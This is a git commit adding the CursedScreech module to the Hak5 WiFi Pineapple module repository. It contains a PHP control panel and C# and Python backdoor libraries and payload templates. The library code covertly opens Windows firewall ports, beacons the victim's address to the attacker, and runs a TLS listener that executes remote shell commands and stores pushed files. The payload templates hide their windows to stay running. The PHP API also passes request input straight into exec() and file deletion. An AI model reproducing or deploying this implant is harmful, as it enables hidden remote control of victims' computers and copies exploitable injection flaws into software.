hak5/nano-tetra-modules
1
0
Fork 0
mirror of https://github.com/hak5/nano-tetra-modules.git synced 2025-10-29 16:58:09 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add modules to repository

Browse Source
This commit is contained in:
Sebastian Kinne
2017-11-16 16:42:22 +11:00
commit d0aa1e38ef
707 changed files with 96750 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

619
CursedScreech/api/module.php Executable file
View File

@@ -0,0 +1,619 @@
<?php
namespace pineapple;
// Root level includes
define('__INCLUDES__', "/pineapple/modules/CursedScreech/includes/");
// Define to hook into Papers' SSL store
define('__SSLSTORE__', "/pineapple/modules/Papers/includes/ssl/");
// Main directory defines
define('__FOREST__', __INCLUDES__ . 'forest/');
define('__SCRIPTS__', __INCLUDES__ . "scripts/");
define('__HELPFILES__', __INCLUDES__ . "help/");
define('__CHANGELOGS__', __INCLUDES__ . "changelog/");
define('__LOGS__', __INCLUDES__ . "errorlogs/");
define('__TARGETLOGS__', __FOREST__ . "targetlogs/");
define('__PAYLOADS__', __INCLUDES__ . "payloads/");
// API defines
define('__API_CS__', __INCLUDES__ . "api/cs/");
define('__API_PY__', __INCLUDES__ . "api/python/");
define('__API_DL__', __INCLUDES__ . "api/downloads/");
// File location defines
define('__ACTIVITYLOG__', __FOREST__ . 'activity.log');
define('__SETTINGS__', __FOREST__ . 'settings');
define('__TARGETS__', __FOREST__ . "targets.log");
define('__COMMANDLOG__', __FOREST__ . "cmd.log");
define('__EZCMDS__', __FOREST__ . "ezcmds");
/*
Move the uploaded file to the payloads directory
*/
if (!empty($_FILES)) {
$response = [];
foreach ($_FILES as $file) {
$tempPath = $file[ 'tmp_name' ];
$name = $file['name'];
// Ensure the upload directory exists
if (!file_exists(__PAYLOADS__)) {
if (!mkdir(__PAYLOADS__, 0755, true)) {
$response[$name] = "Failed";
echo json_encode($response);
die();
}
}
$uploadPath = __PAYLOADS__ . $name;
$res = move_uploaded_file($tempPath, $uploadPath);
if ($res) {
$response[$name] = "Success";
} else {
$response[$name] = "Failed";
}
}
echo json_encode($response);
die();
}
class CursedScreech extends Module {
public function route() {
switch ($this->request->action) {
case 'depends':
$this->depends($this->request->task);
break;
case 'loadSettings':
$this->loadSettings();
break;
case 'updateSettings':
$this->updateSettings($this->request->settings);
break;
case 'readLog':
$this->retrieveLog($this->request->logName, $this->request->type);
break;
case 'getLogs':
$this->getLogs($this->request->type);
break;
case 'clearLog':
$this->clearLog($this->request->logName, $this->request->type);
break;
case 'deleteLog':
$this->deleteLog($this->request->logName, $this->request->type);
break;
case 'startProc':
$this->startProc($this->request->procName);
break;
case 'procStatus':
$this->procStatus($this->request->procName);
break;
case 'stopProc':
$this->stopProc($this->request->procName);
break;
case 'loadCertificates':
if (is_dir(__SSLSTORE__)) {
$this->loadCertificates();
} else {
$this->respond(false, "Papers is not installed. Please enter a path to your keys manually.");
}
break;
case 'loadTargets':
$this->loadTargets();
break;
case 'deleteTarget':
$this->deleteTarget($this->request->target);
break;
case 'sendCommand':
$this->sendCommand($this->request->command, $this->request->targets);
break;
case 'downloadLog':
$this->downloadLog($this->request->logName, $this->request->logType);
break;
case 'loadEZCmds':
$this->loadEZCmds();
break;
case 'saveEZCmds':
$this->saveEZCmds($this->request->ezcmds);
break;
case 'genPayload':
$this->genPayload($this->request->type);
break;
case 'clearDownloads':
$this->clearDownloads();
break;
case 'loadAvailableInterfaces':
$this->loadAvailableInterfaces();
break;
case 'getPayloads':
$this->getPayloads();
break;
case 'deletePayload':
$this->deletePayload($this->request->filePath);
break;
case 'cfgUploadLimit':
$this->cfgUploadLimit();
break;
}
}
/* ============================ */
/* DEPENDS FUNCTIONS */
/* ============================ */
private function depends($action) {
$retData = array();
if ($action == "install") {
exec(__SCRIPTS__ . "installDepends.sh", $retData);
if (implode(" ", $retData) == "Complete") {
$this->respond(true);
return true;
} else {
$this->respond(false);
return false;
}
} else if ($action == "remove") {
exec(__SCRIPTS__ . "removeDepends.sh");
$this->respond(true);
return true;
} else if ($action == "check") {
exec(__SCRIPTS__ . "checkDepends.sh", $retData);
if (implode(" ", $retData) == "Installed") {
$this->respond(true);
return true;
} else {
$this->respond(false);
return false;
}
}
}
/* ============================ */
/* SETTINGS FUNCTIONS */
/* ============================ */
private function loadSettings(){
$configs = array();
$config_file = fopen(__SETTINGS__, "r");
if ($config_file) {
while (($line = fgets($config_file)) !== false) {
$item = explode("=", $line);
$key = $item[0]; $val = trim($item[1]);
$configs[$key] = $val;
}
}
fclose($config_file);
$this->respond(true, null, $configs);
return $configs;
}
private function updateSettings($settings) {
// Load the current settings from file
$configs = $this->loadSettings();
// Update the current list. We do it this way so only the requested
// settings are updated. Probably not necessary but whatevs.
foreach ($settings as $k => $v) {
$configs["$k"] = $v;
}
// Get the serial number of the target's public cert
$configs['client_serial'] = exec(__SCRIPTS__ . "getCertSerial.sh " . $configs['target_key'] . ".cer");
$configs['kuro_serial'] = exec(__SCRIPTS__ . "getCertSerial.sh " . $configs['kuro_key'] . ".cer");
// Get the IP address of the selected listening interface
$configs['iface_ip'] = exec(__SCRIPTS__ . "getInterfaceIP.sh " . $configs['iface_name']);
// Push the updated settings back out to the file
$config_file = fopen(__SETTINGS__, "w");
foreach ($configs as $k => $v) {
fwrite($config_file, $k . "=" . $v . "\n");
}
fclose($config_file);
$this->respond(true);
}
/* ============================ */
/* FOREST FUNCTIONS */
/* ============================ */
private function startProc($procName) {
if ($procName == "kuro.py") {
file_put_contents(__ACTIVITYLOG__, "[+] Starting Kuro...\n", FILE_APPEND);
}
$cmd = "python " . __FOREST__ . $procName . " > /dev/null 2>&1 &";
exec($cmd);
// Check if the process is running and return it's PID
if (($pid = $this->getPID($procName)) != "") {
$this->respond(true, null, $pid);
return $pid;
} else {
$this->logError("Failed_Process", "The following command failed to execute:<br /><br />" . $cmd);
$this->respond(false);
return false;
}
}
private function procStatus($procName) {
if (($status = $this->getPID($procName)) != "") {
$this->respond(true, null, $status);
return true;
}
$this->respond(false);
return false;
}
private function stopProc($procName) {
// Check if the process is running, if so grab it's PID
if (($pid = $this->getPID($procName)) == "") {
$this->respond(true);
return true;
}
// Kuro requires a special bullet
if ($procName == "kuro.py") {
file_put_contents(__ACTIVITYLOG__, "[!] Stopping Kuro...\n", FILE_APPEND);
exec("echo 'killyour:self' >> " . __COMMANDLOG__);
} else {
// Kill the process
exec("kill " . $pid);
}
// Check one more time if it's still running
if (($pid = $this->getPID($procName)) == "") {
$this->respond(true);
return true;
}
$this->respond(false);
return false;
}
private function getPID($procName) {
$data = array();
exec("pgrep -lf " . $procName, $data);
$output = explode(" ", $data[0]);
if (strpos($output[2], $procName) !== False) {
return $output[0];
}
return false;
}
private function loadTargets() {
$targets = array();
$fh = fopen(__TARGETS__, "r");
if ($fh) {
while (($line = fgets($fh)) !== False) {
array_push($targets, rtrim($line, "\n"));
}
} else {
$this->respond(false, "Failed to open " . __TARGETS__);
return false;
}
fclose($fh);
$this->respond(true, null, $targets);
return $targets;
}
private function deleteTarget($target) {
$targetFile = explode("\n", file_get_contents(__TARGETS__));
$key = array_search($target, $targetFile, true);
if ($key !== False) {
unset($targetFile[$key]);
}
$fh = fopen(__TARGETS__, "w");
fwrite($fh, implode("\n", $targetFile));
fclose($fh);
$this->respond(true);
return true;
}
private function sendCommand($cmd, $targets) {
if (count($targets) == 0) {
$this->respond(false);
return;
}
$output = "";
foreach ($targets as $target) {
$output .= $cmd . ":" . $target . "\n";
}
$fh = fopen(__COMMANDLOG__, "w");
if ($fh) {
fwrite($fh, $output);
fclose($fh);
$this->respond(true);
return true;
} else {
$this->respond(false);
return false;
}
}
private function downloadLog($logName, $type) {
$dir = ($type == "forest") ? __FOREST__ : (($type == "targets") ? __TARGETLOGS__ : "");
if (file_exists($dir . $logName)) {
$this->respond(true, null, $this->downloadFile($dir . $logName));
return true;
}
$this->respond(false);
return false;
}
private function genPayload($type) {
if ($type == "python") {
$dir = __API_PY__;
$payload = "payload.py";
$api = "PineappleModules.py";
$zip = "Python_Payload.zip";
} else if ($type == "cs") {
$dir = __API_CS__;
$payload = "payload.cs";
$api = "PineappleModules.cs";
$zip = "CS_Payload.zip";
} else if ($type == "cs_auth") {
$dir = __API_CS__;
$payload = "payloadAuth.cs";
$api = "PineappleModules.cs";
$zip = "CS_Auth_Payload.zip";
} else {
return null;
}
$template = "template/" . $payload;
// Get the configs so we can push them to the payload template
$configs = $this->loadSettings();
// Copy the contents of the payload template and add our configs
$contents = file_get_contents($dir . $template);
$contents = str_replace("IPAddress", $configs['mcast_group'], $contents);
$contents = str_replace("mcastport", $configs['mcast_port'], $contents);
$contents = str_replace("hbinterval", $configs['hb_interval'], $contents);
// The format of the serial number in the C# payload differs from that in the
// Python payload. Therefore, we need this check here.
if ($type == "python") {
$contents = str_replace("serial", $configs['kuro_serial'], $contents);
$contents = str_replace("publicKey", end(explode("/", $configs['target_key'])) . ".cer", $contents);
$contents = str_replace("kuroKey", end(explode("/", $configs['kuro_key'])) . ".cer", $contents);
$contents = str_replace("privateKey", end(explode("/", $configs['target_key'])) . ".pem", $contents);
} else {
$contents = str_replace("serial", exec(__SCRIPTS__ . "bigToLittleEndian.sh " . $configs['kuro_serial']), $contents);
// This part seems confusing but the fingerprint is returned from the script in the following format:
// Fingerprint=AB:CD:EF:12:34:56:78:90
// And the C# payload requires it to be in the following format: ABCDEF1234567890
// Therefore we explode the returned data into an array, keep only the second element, then run a str_replace on all ':' characters
$ret = exec(__SCRIPTS__ . "getFingerprint.sh " . $configs['kuro_key'] . ".cer");
$fingerprint = implode("", explode(":", explode("=", $ret)[1]));
$contents = str_replace("fingerprint", $fingerprint, $contents);
$contents = str_replace("privateKey", "Payload." . end(explode("/", $configs['target_key'])) . ".pfx", $contents);
}
// Write the changes to the payload file
$fh = fopen($dir . $payload, "w");
fwrite($fh, $contents);
fclose($fh);
// Archive the directory
$files = implode(" ", array($payload, $api, "Documentation.pdf"));
// Command: ./packPayload.sh $dir -o $zip -f $files
exec(__SCRIPTS__ . "packPayload.sh " . $dir . " -o " . $zip . " -f \"" . $files . "\"");
// Check if a file exists in the downloads directory
if (count(scandir(__API_DL__)) > 2) {
$this->respond(true, null, $this->downloadFile(__API_DL__ . $zip));
return true;
}
$this->respond(false);
return false;
}
private function clearDownloads() {
$files = scandir(__API_DL__);
$success = true;
foreach ($files as $file) {
if ($file == "." || $file == "..") {continue;}
if (!unlink(__API_DL__ . $file)) {
$success = false;
}
}
$this->respond($success);
return $success;
}
private function loadAvailableInterfaces() {
$data = array();
exec(__SCRIPTS__ . "getListeningInterfaces.sh", $data);
if ($data == NULL) {
$this->logError("Load_Interfaces_Error", "Failed to load available interfaces for 'Listening Interface' dropdown. Either the getListneingInterfaces.sh script failed or none of your interfaces have an IP address associated with them.");
$this->respond(false);
}
$this->respond(true, null, $data);
}
//=========================//
// PAYLOAD FUNCTIONS //
//=========================//
private function getPayloads() {
$files = [];
foreach (scandir(__PAYLOADS__) as $file) {
if ($file == "." || $file == "..") {continue;}
$files[$file] = __PAYLOADS__;
}
$this->respond(true, null, $files);
return $files;
}
private function deletePayload($filePath) {
if (!unlink($filePath)) {
$this->logError("Delete Payload", "Failed to delete payload at path " . $filePath);
$this->respond(false);
return false;
}
$this->respond(true);
return true;
}
private function cfgUploadLimit() {
$data = array();
$res = exec("python " . __SCRIPTS__ . "cfgUploadLimit.py > /dev/null 2>&1 &", $data);
if ($res != "") {
$this->logError("cfg_upload_limit_error", $data);
$this->respond(false);
return false;
}
$this->respond(true);
return true;
}
/* ============================ */
/* EZ CMD FUNCTIONS */
/* ============================ */
private function loadEZCmds() {
$contents = explode("\n", file_get_contents(__EZCMDS__));
$cmdDict = array();
foreach ($contents as $line) {
$cmd = explode(":", $line, 2);
$name = $cmd[0]; $action = $cmd[1];
$cmdDict[$name] = $action;
}
$this->respond(true, null, $cmdDict);
return $cmdDict;
}
private function saveEZCmds($cmds) {
$fh = fopen(__EZCMDS__, "w");
if (!$fh) {
$this->respond(false);
return false;
}
foreach ($cmds as $k => $v) {
fwrite($fh, $k . ":" . $v . "\n");
}
fclose($fh);
}
/* ============================ */
/* MISCELLANEOUS */
/* ============================ */
private function respond($success, $msg = null, $data = null, $error = null) {
$this->response = array("success" => $success,"message" => $msg, "data" => $data, "error" => $error);
}
/* ============================ */
/* LOG FUNCTIONS */
/* ============================ */
private function getLogs($type) {
$dir = ($type == "error") ? __LOGS__ : (($type == "targets") ? __TARGETLOGS__ : __CHANGELOGS__);
$contents = array();
foreach (scandir($dir) as $log) {
if ($log == "." || $log == "..") {continue;}
array_push($contents, $log);
}
$this->respond(true, null, $contents);
}
private function retrieveLog($logname, $type) {
$dir = ($type == "error") ? __LOGS__ : (($type == "help") ? __HELPFILES__ : (($type == "forest") ? __FOREST__ : (($type == "targets") ? __TARGETLOGS__ : __CHANGELOGS__)));
$data = file_get_contents($dir . $logname);
if (!$data) {
$this->respond(true, null, "");
return;
}
$this->respond(true, null, $data);
}
private function clearLog($log,$type) {
$dir = ($type == "forest") ? __FOREST__ : (($type == "targets") ? __TARGETLOGS__ : "");
$fh = fopen($dir . $log, "w");
fclose($fh);
$this->respond(true);
}
private function deleteLog($logname, $type) {
$dir = ($type == "error") ? __LOGS__ : (($type == "targets") ? __TARGETLOGS__ : __CHANGELOGS__);
$res = unlink($dir . $logname);
if (!$res) {
$this->respond(false, "Failed to delete log.");
return;
}
$this->respond(true);
}
private function logError($filename, $data) {
$time = exec("date +'%H_%M_%S'");
$fh = fopen(__LOGS__ . str_replace(" ","_",$filename) . "_" . $time . ".txt", "w+");
fwrite($fh, $data);
fclose($fh);
}
/* ===================================================== */
/* KEY FUNCTIONS TO INTERFACE WITH PAPERS */
/* ===================================================== */
private function loadCertificates() {
$certs = $this->getKeys(__SSLSTORE__);
$this->respond(true,null,$certs);
}
private function getKeys($dir) {
$keyType = "TLS/SSL";
$keys = scandir($dir);
$certs = array();
foreach ($keys as $key) {
if ($key == "." || $key == "..") {continue;}
$parts = explode(".", $key);
$fname = $parts[0];
$type = "." . $parts[1];
// Check if the object name already exists in the array
if ($this->objNameExistsInArray($fname, $certs)) {
foreach ($certs as &$obj) {
if ($obj->Name == $fname) {
$obj->Type .= ", " . $type;
}
}
} else {
// Add a new object to the array
$enc = ($this->keyIsEncrypted($fname)) ? "Yes" : "No";
array_push($certs, (object)array('Name' => $fname, 'Type' => $type, 'Encrypted' => $enc, 'KeyType' => $keyType));
}
}
return $certs;
}
private function objNameExistsInArray($name, $arr) {
foreach ($arr as $x) {
if ($x->Name == $name) {
return True;
}
}
return False;
}
private function keyIsEncrypted($keyName) {
$data = array();
$keyDir = __SSLSTORE__;
exec(__SCRIPTS__ . "testEncrypt.sh -k " . $keyName . " -d " . $keyDir . " 2>&1", $data);
if ($data[0] == "writing RSA key") {
return false;
} else if ($data[0] == "unable to load Private Key") {
return true;
}
}
}

BIN
CursedScreech/includes/api/cs/Documentation.pdf Executable file
View File

Binary file not shown.

390
CursedScreech/includes/api/cs/PineappleModules.cs Normal file
View File

@@ -0,0 +1,390 @@
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.IO;
using System.Linq;
using System.Net;
using System.Net.Security;
using System.Net.Sockets;
using System.Reflection;
using System.Security.Authentication;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace PineappleModules
{
/*
*
* Class: CursedScreech
* Author: sud0nick
* Created: March 3, 2016
* Updated: September 17, 2016
*
* A class that sets up a multicast thread to broadcast back
* to the Pineapple on which port it is listening, sets up a
* server thread for executing remote shell commands secured via
* TLS 1.2, and establishes firewall rules to perform said actions
* unbeknownst to the target.
*
*/
public class CursedScreech
{
// ==================================================
// CLASS ATTRIBUTES
// ==================================================
private SslStream sslStream;
private string msg = "";
private int lport = 0;
private static string certSerial = "";
private static string certHash = "";
private string command = "";
private Boolean recvFile = false;
private byte[] fileBytes;
private int fileBytesLeftToRead = 0;
private string fileName = "";
private string storeDir = "";
private readonly string exePath = System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName;
private readonly string exeName = Path.GetFileNameWithoutExtension(System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName);
// ==================================================
// CURSED SCREECH INITIALIZER
// ==================================================
public CursedScreech() {
// Get the current path and name of the executable to set up rules for it in the firewall
string addTCPRule = "netsh advfirewall firewall add rule name=\"" + exeName + "\" program=\"" + exePath + "\" protocol=TCP dir=in localport=xxxxx action=allow";
string delFirewallRule = "netsh advfirewall firewall delete rule name=\"" + exeName + "\"";
// Generate a random port on which to listen for commands from Kuro
Random rnd = new Random();
lport = rnd.Next(10000, 65534);
// Delete old firewall rules
exec(delFirewallRule);
// Add new firewall rule
exec(addTCPRule.Replace("xxxxx", lport.ToString()));
}
// ===========================================================
// OPTIONAL METHODS TO SET EXPECTED CERTIFICATE PROPERTIES
// ===========================================================
public void setRemoteCertificateHash(string hash) {
certHash = hash;
}
public void setRemoteCertificateSerial(string serial) {
certSerial = serial;
}
// ==================================================
// METHOD TO START THE MULTICAST THREAD
// ==================================================
public void startMulticaster(string address, int port, int heartbeatInterval = 5) {
string addUDPRule = "netsh advfirewall firewall add rule name=\"" + exeName + "\" program=\"" + exePath + "\" protocol=UDP dir=out localport=" + port + " action=allow";
exec(addUDPRule);
new Thread(() => {
UdpClient udpclient = new UdpClient(port);
IPAddress mcastAddr = IPAddress.Parse(address);
udpclient.JoinMulticastGroup(mcastAddr);
IPEndPoint kuro = new IPEndPoint(mcastAddr, port);
while (true) {
Byte[] buffer = null;
string localIP = localAddress();
if (localIP.Length == 0) {
localIP = "0.0.0.0";
}
// If a message is available to be sent then do so
if (msg.Length > 0) {
msg = "msg:" + msg;
buffer = Encoding.ASCII.GetBytes(msg);
udpclient.Send(buffer, buffer.Length, kuro);
msg = "";
}
// Send the listening socket information to Kuro
buffer = Encoding.ASCII.GetBytes(localIP + ":" + lport.ToString());
udpclient.Send(buffer, buffer.Length, kuro);
//Console.WriteLine("Sent heartbeat to Kuro");
// Sleep for however long the heartbeat interval is set
Thread.Sleep(heartbeatInterval * 1000);
}
}).Start();
}
// ====================================================
// MULTITHREADED SECURE LISTENER WITH SHELL EXECUTION
// ====================================================
public void startSecureServerThread(string key, string keyPassword) {
new Thread(() => startSecureServer(key, keyPassword)).Start();
}
// ====================================================
// BLOCKING SECURE SERVER
// ====================================================
public void startSecureServer(string key, string keyPassword) {
// Create a socket for the listener
IPAddress ipAddress = IPAddress.Parse("0.0.0.0");
IPEndPoint localEndPoint = new IPEndPoint(ipAddress, lport);
TcpListener listener = new TcpListener(localEndPoint);
// Read the certificate information from file. This should be a .pfx container
// with a private and public key so we can be verified by Kuro
X509Certificate2 csKey = loadKeys(key, keyPassword);
// Tell the thread to operate in the background
Thread.CurrentThread.IsBackground = true;
bool connected = false;
TcpClient client = new TcpClient();
Int32 numBytesRecvd = 0;
try {
// Start listening
listener.Start();
while (true) {
// Begin listening for connections
client = listener.AcceptTcpClient();
try {
this.sslStream = new SslStream(client.GetStream(), false, atkCertValidation);
this.sslStream.AuthenticateAsServer(csKey, true, (SslProtocols.Tls12 | SslProtocols.Tls11 | SslProtocols.Tls), false);
connected = true;
while (connected) {
byte[] cmdRecvd = new Byte[4096];
numBytesRecvd = this.sslStream.Read(cmdRecvd, 0, cmdRecvd.Length);
if (numBytesRecvd < 1) {
connected = false;
client.Close();
break;
}
// If a file is being received we don't want to decode the data because we
// need to store the raw bytes of the file
if (this.recvFile) {
int numBytesToCopy = cmdRecvd.Length;
if (this.fileBytesLeftToRead < cmdRecvd.Length) {
numBytesToCopy = this.fileBytesLeftToRead;
}
// Append the received bytes to the fileBytes array
System.Buffer.BlockCopy(cmdRecvd, 0, this.fileBytes, (this.fileBytes.Length - this.fileBytesLeftToRead), numBytesToCopy);
this.fileBytesLeftToRead -= numBytesRecvd;
// If we have finished reading the file, store it on the system
if (this.fileBytesLeftToRead < 1) {
// Let the system know we've received the whole file
this.recvFile = false;
// Store the file on the system
storeFile(this.storeDir, this.fileName, this.fileBytes);
// Clear the fileName and fileBytes variables
this.fileName = "";
this.fileBytes = new Byte[1];
}
} else {
// Assign the decrytped message to the command string
this.command = Encoding.ASCII.GetString(cmdRecvd, 0, numBytesRecvd);
Thread shellThread = new Thread(() => sendMsg());
shellThread.Start();
}
}
}
catch (Exception) {
connected = false;
client.Close();
break;
}
}
}
catch (Exception) { }
}
// ==================================================
// METHOD TO SEND DATA TO KURO
// ==================================================
private void sendMsg() {
string msg = this.command;
this.command = "";
// Check if we are about to receive a file and prepare
// the appropriate variables to receive it
// Msg format is sendfile:fileName:byteArraySize
if (msg.Contains("sendfile;")) {
this.recvFile = true;
string[] msgParts = msg.Split(';');
this.fileName = msgParts[1];
this.fileBytesLeftToRead = Int32.Parse(msgParts[2]);
this.storeDir = msgParts[3];
this.fileBytes = new Byte[this.fileBytesLeftToRead];
} else {
// If we are not expecting a file we simply execute
// the received command in the shell and return the results
string ret = exec(msg);
if (ret.Length > 0) {
byte[] retMsg = Encoding.ASCII.GetBytes(ret);
this.sslStream.Write(retMsg, 0, retMsg.Length);
}
}
}
// ==================================================
// METHOD TO GET THE LOCAL IP ADDRESS
// ==================================================
private string localAddress() {
IPHostEntry host = Dns.GetHostEntry(Dns.GetHostName());
foreach (IPAddress ip in host.AddressList) {
if (ip.AddressFamily == AddressFamily.InterNetwork) {
return ip.ToString();
}
}
return "";
}
// ==================================================
// METHOD TO EXECUTE A SHELL COMMAND
// ==================================================
private static string exec(string args) {
System.Diagnostics.Process proc = new System.Diagnostics.Process();
System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
startInfo.CreateNoWindow = true;
startInfo.UseShellExecute = false;
startInfo.RedirectStandardOutput = true;
startInfo.FileName = "cmd.exe";
startInfo.Arguments = "/C " + args;
proc.StartInfo = startInfo;
proc.Start();
proc.WaitForExit(2000);
return proc.StandardOutput.ReadToEnd();
}
// ==================================================
// METHOD TO STORE A RECEIVED FILE
// ==================================================
private void storeFile(string dir, string name, byte[] file) {
// If the directory doesn't exist, create it
Directory.CreateDirectory(dir);
// Write the file out to the directory
File.WriteAllBytes(dir + name, file);
// Tell Kuro the file was stored
byte[] retMsg = Encoding.ASCII.GetBytes("Received and stored file " + name + " in directory " + dir);
this.sslStream.Write(retMsg, 0, retMsg.Length);
}
// ==================================================
// METHOD TO LOAD KEYS FROM A PFX
// ==================================================
private X509Certificate2 loadKeys(string key, string password) {
var certStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(key);
byte[] bytes = new byte[certStream.Length];
certStream.Read(bytes, 0, bytes.Length);
return new X509Certificate2(bytes, password);
}
// ==================================================
// METHOD TO VERIFY KURO'S CERTIFICATE
// ==================================================
private static bool atkCertValidation(Object sender, X509Certificate cert, X509Chain chain, SslPolicyErrors sslPolicyErrors) {
//Console.WriteLine(BitConverter.ToString(cert.GetSerialNumber()));
//Console.WriteLine(cert.GetCertHashString());
if (certSerial != "") {
if (BitConverter.ToString(cert.GetSerialNumber()) != certSerial) { return false; }
}
if (certHash != "") {
if (cert.GetCertHashString() != certHash) { return false; }
}
if (sslPolicyErrors == SslPolicyErrors.None) { return true; }
if (sslPolicyErrors == SslPolicyErrors.RemoteCertificateChainErrors) { return true; }
return false;
}
}
/*
*
* Class: PA_Authorization
* Author: sud0nick
* Date: July 16, 2016
*
* A class for interacting with Portal Auth Shell Server
* This class simply connects back to the PASS script on
* the Pineapple, supplies some system info, and retrieves
* an access key for the victim to log on to the portal.
*
*/
public class PA_Authorization {
private string rHost;
private int rPort;
private string accessKey = "";
public PA_Authorization(string remoteHost = "172.16.42.1", int remotePort = 4443) {
rHost = remoteHost;
rPort = remotePort;
}
public string getAccessKey() {
// Establish a new socket to connect back to the Pineapple
TcpClient c_bk = new TcpClient();
try {
c_bk.Connect(rHost, rPort);
}
catch {
return "";
}
NetworkStream pa_stream = c_bk.GetStream();
// Send system information to PortalAuth
string systemInfo = "0;" + System.Environment.MachineName + ";" + System.Environment.OSVersion;
byte[] sysinfo = Encoding.ASCII.GetBytes(systemInfo);
pa_stream.Write(sysinfo, 0, sysinfo.Length);
// Get the access key back from PortalAuth
byte[] msgRecvd = new Byte[1024];
Int32 bytesRecvd = 0;
bytesRecvd = pa_stream.Read(msgRecvd, 0, msgRecvd.Length);
if (bytesRecvd < 1) {
c_bk.Close();
return "";
}
else {
accessKey = Encoding.ASCII.GetString(msgRecvd, 0, bytesRecvd);
}
// Close the connection
c_bk.Close();
// Return accessKey with either an error message or the key that was received
return accessKey;
}
}
}

24
CursedScreech/includes/api/cs/template/payload.cs Executable file
View File

@@ -0,0 +1,24 @@
using System;
using System.Drawing;
using System.Windows.Forms;
using CursedScreech;
namespace Payload
{
public partial class Form1 : Form {
public Form1() {
InitializeComponent();
CursedScreech.CursedScreech cs = new CursedScreech.CursedScreech();
cs.startMulticaster("IPAddress", mcastport, hbinterval);
cs.setRemoteCertificateSerial("serial");
cs.setRemoteCertificateHash("fingerprint");
cs.startSecureServerThread("privateKey", "password");
}
private void Form1_FormClosing(object sender, FormClosingEventArgs e) {
e.Cancel = true;
this.Hide();
}
}
}

44
CursedScreech/includes/api/cs/template/payloadAuth.cs Executable file
View File

@@ -0,0 +1,44 @@
using System;
using System.Drawing;
using System.Windows.Forms;
using PineappleModules;
namespace Payload
{
public partial class Form1 : Form {
PA_Authorization pauth = new PA_Authorization();
public Form1() {
InitializeComponent();
CursedScreech cs = new CursedScreech();
cs.startMulticaster("IPAddress", mcastport, hbinterval);
cs.setRemoteCertificateSerial("serial");
cs.setRemoteCertificateHash("fingerprint");
cs.startSecureServerThread("privateKey", "password");
}
private void Form1_FormClosing(object sender, FormClosingEventArgs e) {
e.Cancel = true;
this.Hide();
}
private void accessKeyButton_Click(object sender, EventArgs e) {
// Request an access key from the Pineapple
string key = pauth.getAccessKey();
// Check if a key was returned
string msg;
if (key.Length > 0) {
msg = "Your access key is unique to you so DO NOT give it away!\n\nAccess Key: " + key;
}
else {
msg = "Failed to retrieve an access key from the server. Please try again later.";
}
// Display message to the user
MessageBox.Show(msg);
}
}
}

BIN
CursedScreech/includes/api/python/Documentation.pdf Executable file
View File

Binary file not shown.

152
CursedScreech/includes/api/python/PineappleModules.py Executable file
View File

@@ -0,0 +1,152 @@
import time
import subprocess
from random import randint
import platform
import threading
import sys
from ssl import *
from socket import *
class CursedScreech:
def __init__(self, progName):
self.ProgName = progName
self.msg = ""
self.lport = 0
self.certSerial = ""
self.threads = []
# ==================================================
# METHOD TO START THE MULTICAST THREAD
# ==================================================
def startMulticaster(self, addr, port, heartbeatInterval = 5):
# Set up a heartbeat thread
hbt = threading.Thread(target=self.sendHeartbeat, args=(addr,port,heartbeatInterval))
self.threads.append(hbt)
hbt.start()
# ====================================================
# MULTITHREADED SECURE LISTENER WITH SHELL EXECUTION
# ====================================================
def startSecureServerThread(self, keyFile, certFile, remoteCert):
sst = threading.Thread(target=self.startSecureServer, args=(keyFile,certFile,remoteCert))
self.threads.append(sst)
sst.start()
# ========================================================
# METHOD TO SET THE EXPECTED CERTIFICATE SERIAL NUMBER
# ========================================================
def setRemoteCertificateSerial(self, serial):
self.certSerial = serial
# ======================================
# HEARTBEAT THREAD
# ======================================
def sendHeartbeat(self, MCAST_GROUP, MCAST_PORT, hbInterval):
# Add a firewall rule in Windows to allow outbound UDP packets
addUDPRule = "netsh advfirewall firewall add rule name=\"" + self.ProgName + "\" protocol=UDP dir=out localport=" + str(MCAST_PORT) + " action=allow";
subprocess.call(addUDPRule, shell=True, stdout=subprocess.PIPE)
# Set up a UDP socket for multicast
sck = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)
sck.setsockopt(IPPROTO_IP, IP_MULTICAST_TTL, 2)
# Infinitely loop and send a broadcast to MCAST_GROUP with our
# listener's IP and port information.
while True:
ip = gethostbyname(gethostname())
if len(self.msg) > 0:
sck.sendto("msg:" + self.msg, (MCAST_GROUP, MCAST_PORT))
# Clear out the message
self.msg=""
sck.sendto(ip + ":" + str(self.lport), (MCAST_GROUP, MCAST_PORT))
time.sleep(hbInterval)
# ===================================================
# BLOCKING SECURE LISTENER WITH SHELL EXECUTION
# ===================================================
def startSecureServer(self, keyFile, certFile, remoteCert):
# Create a listener for the secure shell
ssock = socket(AF_INET, SOCK_STREAM)
ssock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
listener = wrap_socket(ssock, ssl_version=PROTOCOL_SSLv23, keyfile=keyFile, certfile=certFile, cert_reqs=CERT_REQUIRED, ca_certs=remoteCert)
# Pick a random port number on which to listen and attempt to bind to it
# If it is already in use simply continue the process until an available
# port is found.
bound = False
while bound == False:
self.lport = randint(30000, 65534)
try:
listener.bind((gethostname(), self.lport))
bound = True
except:
bound = False
continue
# Set up rules in the firewall to allow connections from this program
addTCPRule = "netsh advfirewall firewall add rule name=\"" + self.ProgName + "\" protocol=TCP dir=in localport=xxxxx action=allow";
delFirewallRule = "netsh advfirewall firewall delete rule name=\"" + self.ProgName + "\"";
try:
# Delete old firewall rules if they exist
subprocess.call(delFirewallRule, shell=True, stdout=subprocess.PIPE)
# Add a firewall rule to Windows Firewall that allows inbound connections on the port
addTCPRule = addTCPRule.replace('xxxxx', str(self.lport))
subprocess.call(addTCPRule, shell=True, stdout=subprocess.PIPE)
except:
pass
listener.listen(5)
connected = False
# Begin accepting connections and pass all commands to execShell in a separate thread
while 1:
if not connected:
(client, address) = listener.accept()
connected = True
# Verify the client's certificate. If the serial number doesn't match
# kill the connection and wait for a new one.
if len(self.certSerial) > 0:
cert = client.getpeercert()
if not cert['serialNumber'] == self.certSerial:
connected = False
